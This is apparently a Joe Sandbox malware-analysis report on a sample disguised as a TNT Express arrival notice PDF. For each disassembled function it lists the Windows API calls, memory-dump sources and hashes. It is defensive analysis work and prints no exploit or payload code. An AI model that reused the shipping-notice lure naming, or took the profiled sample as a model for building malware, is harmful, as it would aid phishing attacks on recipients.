Function 0092D2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,0095CB68), ref: 0092D2FB
GetLastError.KERNEL32 ref: 0092D30A
CreateDirectoryW.KERNEL32(?,00000000), ref: 0092D319
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0095CB68), ref: 0092D376

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: 61cbaea89924e2dcb7334302b8aed0b80fd950c31cbc14c862970b68ddc83c38
Instruction ID: 1f06d600b77514577430f9155147570e50501ba94ef8e8077ae56c767b5fb206
Opcode Fuzzy Hash: 61cbaea89924e2dcb7334302b8aed0b80fd950c31cbc14c862970b68ddc83c38
Instruction Fuzzy Hash: 9321A37050A3119F8300DF28D8859AE77E8FE56368F104A1DF499C32A1D730D945CB93

Function 00921571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00921014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0092102A
Part of subcall function 00921014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00921036
Part of subcall function 00921014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00921045
Part of subcall function 00921014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0092104C
Part of subcall function 00921014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00921062

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 009215BE
_memcmp.LIBVCRUNTIME ref: 009215E1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00921617
HeapFree.KERNEL32(00000000), ref: 0092161E

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 6341d75dc54b36364d2980d7333f2b39ae7d19f55d882634815d72318d36ba6c
Instruction ID: 9a6327818f054fac6210cedf0c52e2da2ee8fc07d87a5e1ad6dd3f85fd3ab432
Opcode Fuzzy Hash: 6341d75dc54b36364d2980d7333f2b39ae7d19f55d882634815d72318d36ba6c
Instruction Fuzzy Hash: 0A21CC71E00219EFDF04DFA4D948BEEB7F8EF90345F084499E401AB244E730AA04DBA0

Function 00952782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 0095280A
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00952824
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00952832
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00952840

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: 82e22de7d4817a893feb54b3a679c4ea08c23316b838b31f4e6d98c0b1ee4ef1
Instruction ID: 8c4c196efdab2653ef69914b5be4d193a68efb426cff11b5796b328296dd444e
Opcode Fuzzy Hash: 82e22de7d4817a893feb54b3a679c4ea08c23316b838b31f4e6d98c0b1ee4ef1
Instruction Fuzzy Hash: 6021C431208611AFD714DB25C845F6A77A9EF86325F148158F826CB6D2C775FC46C7D0

Function 009278F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00928D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,0092790A,?,000000FF,?,00928754,00000000,?,0000001C,?,?), ref: 00928D8C
Part of subcall function 00928D7D: lstrcpyW.KERNEL32(00000000,?), ref: 00928DB2
Part of subcall function 00928D7D: lstrcmpiW.KERNEL32(00000000,?,0092790A,?,000000FF,?,00928754,00000000,?,0000001C,?,?), ref: 00928DE3

lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00928754,00000000,?,0000001C,?,?,00000000), ref: 00927923
lstrcpyW.KERNEL32(00000000,?), ref: 00927949
lstrcmpiW.KERNEL32(00000002,cdecl,?,00928754,00000000,?,0000001C,?,?,00000000), ref: 00927984

Strings

cdecl, xrefs: 0092797B

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 62ba23ac4003ce4ceb84393d9f6d9c791aeee2d4cf6e1c708b3125278ff2f346
Instruction ID: 25890959cd78b95cc7d9114bd6b1131e95b8ad781f0a3c20dc433ad0dd69e184
Opcode Fuzzy Hash: 62ba23ac4003ce4ceb84393d9f6d9c791aeee2d4cf6e1c708b3125278ff2f346
Instruction Fuzzy Hash: 8611293E204311AFCB155F79E844E7BB7A9FF85390B00402AF906CB3A8EB319841D751

Function 00957CC2 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 00957D0B
SetWindowLongW.USER32(00000000,000000F0,?), ref: 00957D2A
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00957D42
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0093B7AD,00000000), ref: 00957D6B

Part of subcall function 008D9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 008D9BB2

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Window$Long
String ID:
API String ID: 847901565-0
Opcode ID: 9b78bd04e69424c4dc8803474477f956e385cf2b8b6d1a5cc2a466fdd274f4f0
Instruction ID: 5e6792dbed4d7740cb905c31c72dd05edc336555c0857e532855c8e853a6170b
Opcode Fuzzy Hash: 9b78bd04e69424c4dc8803474477f956e385cf2b8b6d1a5cc2a466fdd274f4f0
Instruction Fuzzy Hash: 3A11DE31118615AFCB10CFAAEC04A667BA8BF45362B114724FC35C72E0E7308A54DB40

Function 00955660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001060,?,00000004), ref: 009556BB
_wcslen.LIBCMT ref: 009556CD
_wcslen.LIBCMT ref: 009556D8
SendMessageW.USER32(?,00001002,00000000,?), ref: 00955816

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: MessageSend_wcslen
String ID:
API String ID: 455545452-0
Opcode ID: c07e8d70818fb0be545b28b7d21a508c4aee4db1636a9fffadf6bca9bf12989a
Instruction ID: d6fe722c22facd4bdaa27ebfbc7493e5c1bc9618f6e8ac0ed86af3f082d1067f
Opcode Fuzzy Hash: c07e8d70818fb0be545b28b7d21a508c4aee4db1636a9fffadf6bca9bf12989a
Instruction Fuzzy Hash: 9C11E17160060996DB20DFA7CC91AEE77BCFF01362F504426FD15D6092E7748A88CB60

Function 00921A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00921A47
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00921A59
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00921A6F
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00921A8A

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 32464951f0301466af80d12f066ce0753500763f72d42895b8b57bb084694fbb
Instruction ID: 07de4bca50989bf2e2c5c85015f4be4c528f4afff5aa6d78cfcf6dda843dd542
Opcode Fuzzy Hash: 32464951f0301466af80d12f066ce0753500763f72d42895b8b57bb084694fbb
Instruction Fuzzy Hash: 9411273A901229FFEF109BA5C985FADBB78EB18750F2000A1EA00B7294D6716E50DB94

Function 0092E1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0092E1FD
MessageBoxW.USER32(?,?,?,?), ref: 0092E230
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0092E246
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0092E24D

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: ce68b9c28ee2306d5b9ba7983e81c072af5680c5beed56f1fbfa4f0570b0f3db
Instruction ID: ce36c1397aaa7a62831cf78aeae15130c6eb01d6c68d4492aee10e44ec684063
Opcode Fuzzy Hash: ce68b9c28ee2306d5b9ba7983e81c072af5680c5beed56f1fbfa4f0570b0f3db
Instruction Fuzzy Hash: ED1108B6918365FFC7019BACAC45A9E7FACEB45311F104216F925E3290D270890497A0

Function 008ED1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,?,008ECFF9,00000000,00000004,00000000), ref: 008ED218
GetLastError.KERNEL32 ref: 008ED224
__dosmaperr.LIBCMT ref: 008ED22B
ResumeThread.KERNEL32(00000000), ref: 008ED249

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Thread$CreateErrorLastResume__dosmaperr
String ID:
API String ID: 173952441-0
Opcode ID: 6c4322a614e94b0b5839e6fdc234204adc8e0e32ab2bb5d0ded67c83964fe3b6
Instruction ID: 71cf89b8d3e1236e5433f10a2439845cab7811f5428195a2533248e1a4f4ca3d
Opcode Fuzzy Hash: 6c4322a614e94b0b5839e6fdc234204adc8e0e32ab2bb5d0ded67c83964fe3b6
Instruction Fuzzy Hash: 48010476809348BFC7105BABDC05AAE7A69FF83331F104219FA24D21D0CB719805D7A1

Function 008C600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 008C604C
GetStockObject.GDI32(00000011), ref: 008C6060
SendMessageW.USER32(00000000,00000030,00000000), ref: 008C606A

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: b14fe132d6aa48bb34d348d6e7d9897749ccb62fdc9191ca6b706b6b1ee6587e
Instruction ID: d59599938aa5b5a655c513fd971867d35edab5583aa7635bbef6d95f607a3bb9
Opcode Fuzzy Hash: b14fe132d6aa48bb34d348d6e7d9897749ccb62fdc9191ca6b706b6b1ee6587e
Instruction Fuzzy Hash: 70115EB2505A09BFEF124F949C44FEA7B79FF18765F050125FA14A2110D732DC60AB90

Function 008E3B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 008E3B56

Part of subcall function 008E3AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 008E3AD2
Part of subcall function 008E3AA3: ___AdjustPointer.LIBCMT ref: 008E3AED

_UnwindNestedFrames.LIBCMT ref: 008E3B6B
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 008E3B7C
CallCatchBlock.LIBVCRUNTIME ref: 008E3BA4

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction ID: 7186a06ccb528a01edcf35a8dfc6190d21b425437ad7bce72c6308fca9c1da88
Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction Fuzzy Hash: 57012D32100189BBDF125E9ACC46DEB3B69FF8A754F044014FE5896121C732D961DBA1

Function 008F3073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,008C13C6,00000000,00000000,?,008F301A,008C13C6,00000000,00000000,00000000,?,008F328B,00000006,FlsSetValue), ref: 008F30A5
GetLastError.KERNEL32(?,008F301A,008C13C6,00000000,00000000,00000000,?,008F328B,00000006,FlsSetValue,00962290,FlsSetValue,00000000,00000364,?,008F2E46), ref: 008F30B1
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,008F301A,008C13C6,00000000,00000000,00000000,?,008F328B,00000006,FlsSetValue,00962290,FlsSetValue,00000000), ref: 008F30BF

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 1eaea211209bac8084c58bbe524a6735d8d36cff306258777ec7f0577e62bb39
Instruction ID: f1e24e0be9085db21aa3b63af144a14740f26acdedf50b14e2473880663ddb54
Opcode Fuzzy Hash: 1eaea211209bac8084c58bbe524a6735d8d36cff306258777ec7f0577e62bb39
Instruction Fuzzy Hash: 3D01D472319B2AAFCB214A799C449777B98FF85BA1B100621FA15E3240CF21D941C6E0

Function 00927464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0092747F
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00927497
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 009274AC
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 009274CA

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: 28757efebc8d5cecadba9da2462b50014c1c151b37700eda062bf4fcaf14ec4a
Instruction ID: 8850c226e8a11850a44aa38cf21c1698dca5698d74e9f8df398859f7b54c0eae
Opcode Fuzzy Hash: 28757efebc8d5cecadba9da2462b50014c1c151b37700eda062bf4fcaf14ec4a
Instruction Fuzzy Hash: EF11C4B12093249FE720AF95FC08F92BFFDEB00B00F108969E616E6165D774E904DB51

Function 0092B0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0092ACD3,?,00008000), ref: 0092B0C4
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0092ACD3,?,00008000), ref: 0092B0E9
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0092ACD3,?,00008000), ref: 0092B0F3
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0092ACD3,?,00008000), ref: 0092B126

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: 0104201c3ad1176b3afd739a836dc80cc3df1cbb0c889fe94c85f9886625efe5
Instruction ID: 0f65c09887381562b8a1118b80d18a9e8ee0feb7e435f3932f41d88dd55224ef
Opcode Fuzzy Hash: 0104201c3ad1176b3afd739a836dc80cc3df1cbb0c889fe94c85f9886625efe5
Instruction Fuzzy Hash: 60116171C09A3DDBCF00AFE5E9686EEBBB8FF09711F104485D941B224ACB3455509B51

Function 00922DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00922DC5
GetWindowThreadProcessId.USER32(?,00000000), ref: 00922DD6
GetCurrentThreadId.KERNEL32 ref: 00922DDD
AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00922DE4

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 7a7078946e8b6b70d92fc5b7502d617d72a6e5f424c492eb9df84a6956328828
Instruction ID: 5e7e9bef1543b3501913629601e874e719cf9cb1cdfb1b9cf4c3e5a588c7bc3e
Opcode Fuzzy Hash: 7a7078946e8b6b70d92fc5b7502d617d72a6e5f424c492eb9df84a6956328828
Instruction Fuzzy Hash: AEE06DB211A3347BD7202B73AC0DFEB3E6CEB42BA2F000015B105D50809AA48940D7B0

Function 00958863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 008D9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 008D9693
Part of subcall function 008D9639: SelectObject.GDI32(?,00000000), ref: 008D96A2
Part of subcall function 008D9639: BeginPath.GDI32(?), ref: 008D96B9
Part of subcall function 008D9639: SelectObject.GDI32(?,00000000), ref: 008D96E2

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00958887
LineTo.GDI32(?,?,?), ref: 00958894
EndPath.GDI32(?), ref: 009588A4
StrokePath.GDI32(?), ref: 009588B2

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 757204b9dcc2d933842dd100fbced19a7b6d46b49586c17d5db93f0080be7d12
Instruction ID: 4352e333295ec5718feafa47dd93dba649bba66987515c45dc93bbbb504544a1
Opcode Fuzzy Hash: 757204b9dcc2d933842dd100fbced19a7b6d46b49586c17d5db93f0080be7d12
Instruction Fuzzy Hash: 79F09A36019319BADB126FA9AC09FCE3B19AF06312F048001FA21610E1C7755510EBA5

Function 008D98B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 008D98CC
SetTextColor.GDI32(?,?), ref: 008D98D6
SetBkMode.GDI32(?,00000001), ref: 008D98E9
GetStockObject.GDI32(00000005), ref: 008D98F1

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

